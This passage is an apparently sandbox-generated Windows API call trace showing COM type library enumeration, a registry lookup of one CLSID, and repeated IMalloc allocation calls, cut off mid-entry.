ITypeInfo:RemoteGetTypeAttr (in: This=0x780e588, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.818] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdab8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdab8) returned 0x0 [0030.818] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ceb38, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ceb38) returned 0x0 [0030.818] IUnknown:Release (This=0xb4cdab8) returned 0x1 [0030.818] IUnknown:Release (This=0xb4ceb38) returned 0x1 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0x780e588) returned 0x0 [0030.818] IUnknown:Release (This=0x780e588) returned 0x1 [0030.818] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x99, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e648) returned 0x0 [0030.818] IUnknown:Release (This=0x780e6a8) returned 0x2 [0030.818] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e648, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.818] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdb68, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdb68) returned 0x0 [0030.818] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cebe8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.818] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cebe8) returned 0x0 [0030.819] IUnknown:Release (This=0xb4cdb68) returned 0x1 [0030.819] IUnknown:Release (This=0xb4cebe8) returned 0x1 [0030.819] ITypeInfo:LocalReleaseTypeAttr (This=0x780e648) returned 0x0 [0030.819] IUnknown:Release (This=0x780e648) returned 0x1 [0030.819] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e708) returned 0x0 [0030.819] IUnknown:Release (This=0x780e768) returned 0x2 [0030.819] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e708, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.819] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdc18, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.819] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdc18) returned 0x0 [0030.819] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cec98, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.819] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cec98) returned 0x0 [0030.819] IUnknown:Release (This=0xb4cdc18) returned 0x1 [0030.819] IUnknown:Release (This=0xb4cec98) returned 0x1 [0030.819] ITypeInfo:LocalReleaseTypeAttr (This=0x780e708) returned 0x0 [0030.819] IUnknown:Release (This=0x780e708) returned 0x1 [0030.819] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e7c8) returned 0x0 [0030.819] IUnknown:Release (This=0x780e828) returned 0x2 [0030.819] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e7c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.819] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdcc8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.819] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdcc8) returned 0x0 [0030.819] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cecf0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.819] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cecf0) returned 0x0 [0030.819] IUnknown:Release (This=0xb4cdcc8) returned 0x1 [0030.820] IUnknown:Release (This=0xb4cecf0) returned 0x1 [0030.820] ITypeInfo:LocalReleaseTypeAttr (This=0x780e7c8) returned 0x0 [0030.820] IUnknown:Release (This=0x780e7c8) returned 0x1 [0030.820] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e888) returned 0x0 [0030.820] IUnknown:Release (This=0x780e8e8) returned 0x2 [0030.820] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e888, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.820] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdd78, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.820] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdd78) returned 0x0 [0030.820] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ced48, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.820] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ced48) returned 0x0 [0030.820] IUnknown:Release (This=0xb4cdd78) returned 0x1 [0030.820] IUnknown:Release (This=0xb4ced48) returned 0x1 [0030.820] ITypeInfo:LocalReleaseTypeAttr (This=0x780e888) returned 0x0 [0030.820] IUnknown:Release (This=0x780e888) returned 0x1 [0030.820] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780e948) returned 0x0 [0030.820] IUnknown:Release (This=0x780e9a8) returned 0x2 [0030.820] ITypeInfo:RemoteGetTypeAttr (in: This=0x780e948, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.820] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccfb8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.820] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccfb8) returned 0x0 [0030.820] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd118, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.820] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd118) returned 0x0 [0030.820] IUnknown:Release (This=0xb4ccfb8) returned 0x1 [0030.821] IUnknown:Release (This=0xb4cd118) returned 0x1 [0030.821] ITypeInfo:LocalReleaseTypeAttr (This=0x780e948) returned 0x0 [0030.821] IUnknown:Release (This=0x780e948) returned 0x1 [0030.821] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780ea08) returned 0x0 [0030.821] IUnknown:Release (This=0x780ea68) returned 0x2 [0030.821] ITypeInfo:RemoteGetTypeAttr (in: This=0x780ea08, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.821] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccf08, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.821] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccf08) returned 0x0 [0030.821] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd170, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.821] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd170) returned 0x0 [0030.821] IUnknown:Release (This=0xb4ccf08) returned 0x1 [0030.821] IUnknown:Release (This=0xb4cd170) returned 0x1 [0030.821] ITypeInfo:LocalReleaseTypeAttr (This=0x780ea08) returned 0x0 [0030.821] IUnknown:Release (This=0x780ea08) returned 0x1 [0030.821] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780eac8) returned 0x0 [0030.821] IUnknown:Release (This=0x780eb28) returned 0x2 [0030.821] ITypeInfo:RemoteGetTypeAttr (in: This=0x780eac8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.821] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.821] StringFromGUID2 (in: rguid=0xb46ecb8*(Data1=0x646be917, Data2=0xefed, Data3=0x46c6, Data4=([0]=0xaf, [1]=0xc9, [2]=0xca, [3]=0x1f, [4]=0xbd, [5]=0x3c, [6]=0x51, [7]=0x0)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{646BE917-EFED-46C6-AFC9-CA1FBD3C5100}") returned 39 [0030.821] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.821] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.822] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.822] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.823] ITypeInfo:LocalReleaseTypeAttr (This=0x780eac8) returned 0x0 [0030.823] IUnknown:Release (This=0x780eac8) returned 0x1 [0030.823] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa0, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780eb88) returned 0x0 [0030.823] IUnknown:Release (This=0x780ed08) returned 0x2 [0030.823] ITypeInfo:RemoteGetTypeAttr (in: This=0x780eb88, ppTypeAttr=0x2e6a20, pDummy=0x6 | out: ppTypeAttr=0x2e6a20, pDummy=0x6) returned 0x0 [0030.823] ITypeInfo:RemoteGetTypeAttr (in: This=0x780d988, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.823] ITypeInfo:LocalReleaseTypeAttr (This=0x780d988) returned 0x0 [0030.823] ITypeInfo:RemoteGetTypeAttr (in: This=0x780daa8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.823] ITypeInfo:LocalReleaseTypeAttr (This=0x780daa8) returned 0x0 [0030.823] IUnknown:Release (This=0x780d988) returned 0x1 [0030.823] IUnknown:Release (This=0x780daa8) returned 0x1 [0030.823] ITypeInfo:LocalReleaseTypeAttr (This=0x780eb88) returned 0x0 [0030.823] IUnknown:Release (This=0x780eb88) returned 0x1 [0030.823] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa1, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780ed68) returned 0x0 [0030.823] IUnknown:Release (This=0x780edc8) returned 0x2 [0030.823] ITypeInfo:RemoteGetTypeAttr (in: This=0x780ed68, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.824] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce248, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.824] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce248) returned 0x0 [0030.824] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf1c0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.824] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf1c0) returned 0x0 [0030.824] IUnknown:Release (This=0xb4ce248) returned 0x1 [0030.824] IUnknown:Release (This=0xb4cf1c0) returned 0x1 [0030.824] ITypeInfo:LocalReleaseTypeAttr (This=0x780ed68) returned 0x0 [0030.824] IUnknown:Release (This=0x780ed68) returned 0x1 [0030.824] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa2, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780ee28) returned 0x0 [0030.824] IUnknown:Release (This=0x780ee88) returned 0x2 [0030.824] ITypeInfo:RemoteGetTypeAttr (in: This=0x780ee28, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.824] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce2f8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.824] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce2f8) returned 0x0 [0030.824] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf218, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.824] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf218) returned 0x0 [0030.824] IUnknown:Release (This=0xb4ce2f8) returned 0x1 [0030.824] IUnknown:Release (This=0xb4cf218) returned 0x1 [0030.824] ITypeInfo:LocalReleaseTypeAttr (This=0x780ee28) returned 0x0 [0030.824] IUnknown:Release (This=0x780ee28) returned 0x1 [0030.824] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa3, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780eee8) returned 0x0 [0030.824] IUnknown:Release (This=0x780ef48) returned 0x2 [0030.824] ITypeInfo:RemoteGetTypeAttr (in: This=0x780eee8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.825] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce3a8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.825] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce3a8) returned 0x0 [0030.825] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf270, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.825] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf270) returned 0x0 [0030.825] IUnknown:Release (This=0xb4ce3a8) returned 0x1 [0030.825] IUnknown:Release (This=0xb4cf270) returned 0x1 [0030.825] ITypeInfo:LocalReleaseTypeAttr (This=0x780eee8) returned 0x0 [0030.825] IUnknown:Release (This=0x780eee8) returned 0x1 [0030.825] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa4, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780efa8) returned 0x0 [0030.825] IUnknown:Release (This=0x780f008) returned 0x2 [0030.825] ITypeInfo:RemoteGetTypeAttr (in: This=0x780efa8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.825] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce458, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.825] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce458) returned 0x0 [0030.825] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf2c8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.825] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf2c8) returned 0x0 [0030.825] IUnknown:Release (This=0xb4ce458) returned 0x1 [0030.825] IUnknown:Release (This=0xb4cf2c8) returned 0x1 [0030.825] ITypeInfo:LocalReleaseTypeAttr (This=0x780efa8) returned 0x0 [0030.825] IUnknown:Release (This=0x780efa8) returned 0x1 [0030.825] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa5, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780f068) returned 0x0 [0030.825] IUnknown:Release (This=0x780f0c8) returned 0x2 [0030.825] ITypeInfo:RemoteGetTypeAttr (in: This=0x780f068, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.826] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce508, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.826] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce508) returned 0x0 [0030.826] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf320, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.826] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf320) returned 0x0 [0030.826] IUnknown:Release (This=0xb4ce508) returned 0x1 [0030.826] IUnknown:Release (This=0xb4cf320) returned 0x1 [0030.826] ITypeInfo:LocalReleaseTypeAttr (This=0x780f068) returned 0x0 [0030.826] IUnknown:Release (This=0x780f068) returned 0x1 [0030.826] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa6, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780f128) returned 0x0 [0030.826] IUnknown:Release (This=0x780f188) returned 0x2 [0030.826] ITypeInfo:RemoteGetTypeAttr (in: This=0x780f128, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.826] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce5b8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.826] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce5b8) returned 0x0 [0030.826] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf378, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.826] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf378) returned 0x0 [0030.826] IUnknown:Release (This=0xb4ce5b8) returned 0x1 [0030.826] IUnknown:Release (This=0xb4cf378) returned 0x1 [0030.826] ITypeInfo:LocalReleaseTypeAttr (This=0x780f128) returned 0x0 [0030.826] IUnknown:Release (This=0x780f128) returned 0x1 [0030.826] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa7, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780f1e8) returned 0x0 [0030.826] IUnknown:Release (This=0x780f248) returned 0x2 [0030.826] ITypeInfo:RemoteGetTypeAttr (in: This=0x780f1e8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce668, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.827] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce668) returned 0x0 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf3d0, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.827] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf3d0) returned 0x0 [0030.827] IUnknown:Release (This=0xb4ce668) returned 0x1 [0030.827] IUnknown:Release (This=0xb4cf3d0) returned 0x1 [0030.827] ITypeInfo:LocalReleaseTypeAttr (This=0x780f1e8) returned 0x0 [0030.827] IUnknown:Release (This=0x780f1e8) returned 0x1 [0030.827] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa8, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780f2a8) returned 0x0 [0030.827] IUnknown:Release (This=0x780f308) returned 0x2 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0x780f2a8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce718, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.827] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce718) returned 0x0 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf428, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.827] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf428) returned 0x0 [0030.827] IUnknown:Release (This=0xb4ce718) returned 0x1 [0030.827] IUnknown:Release (This=0xb4cf428) returned 0x1 [0030.827] ITypeInfo:LocalReleaseTypeAttr (This=0x780f2a8) returned 0x0 [0030.827] IUnknown:Release (This=0x780f2a8) returned 0x1 [0030.827] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa9, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780f368) returned 0x0 [0030.827] IUnknown:Release (This=0x780f3c8) returned 0x2 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0x780f368, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.827] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce7c8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.828] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce7c8) returned 0x0 [0030.828] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf480, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.828] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf480) returned 0x0 [0030.828] IUnknown:Release (This=0xb4ce7c8) returned 0x1 [0030.828] IUnknown:Release (This=0xb4cf480) returned 0x1 [0030.828] ITypeInfo:LocalReleaseTypeAttr (This=0x780f368) returned 0x0 [0030.828] IUnknown:Release (This=0x780f368) returned 0x1 [0030.828] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xaa, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0x780f428) returned 0x0 [0030.828] IUnknown:Release (This=0x780f488) returned 0x2 [0030.828] ITypeInfo:RemoteGetTypeAttr (in: This=0x780f428, ppTypeAttr=0x2e6a20, pDummy=0xffffffffff | out: ppTypeAttr=0x2e6a20, pDummy=0xffffffffff) returned 0x0 [0030.828] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce878, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.828] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce878) returned 0x0 [0030.828] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cf4d8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.828] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cf4d8) returned 0x0 [0030.828] IUnknown:Release (This=0xb4ce878) returned 0x1 [0030.828] IUnknown:Release (This=0xb4cf4d8) returned 0x1 [0030.828] ITypeInfo:LocalReleaseTypeAttr (This=0x780f428) returned 0x0 [0030.828] IUnknown:Release (This=0x780f428) returned 0x1 [0030.828] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x0, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbe88) returned 0x0 [0030.828] IUnknown:Release (This=0xb4cbe88) returned 0x1 [0030.828] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbee0) returned 0x0 [0030.828] IUnknown:Release (This=0xb4cbee0) returned 0x1 [0030.828] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbf38) returned 0x0 [0030.828] IUnknown:Release (This=0xb4cbf38) returned 0x1 [0030.828] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbf90) returned 0x0 [0030.828] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.828] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.829] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.829] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.829] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.829] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.829] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.829] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.829] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.829] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.829] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.829] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.829] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.829] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.829] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.829] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.829] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.829] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.829] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.829] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.830] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.830] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.830] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.830] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.830] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.830] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.830] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.830] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.831] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.831] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.831] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.831] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.831] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.831] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.831] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.831] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.831] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 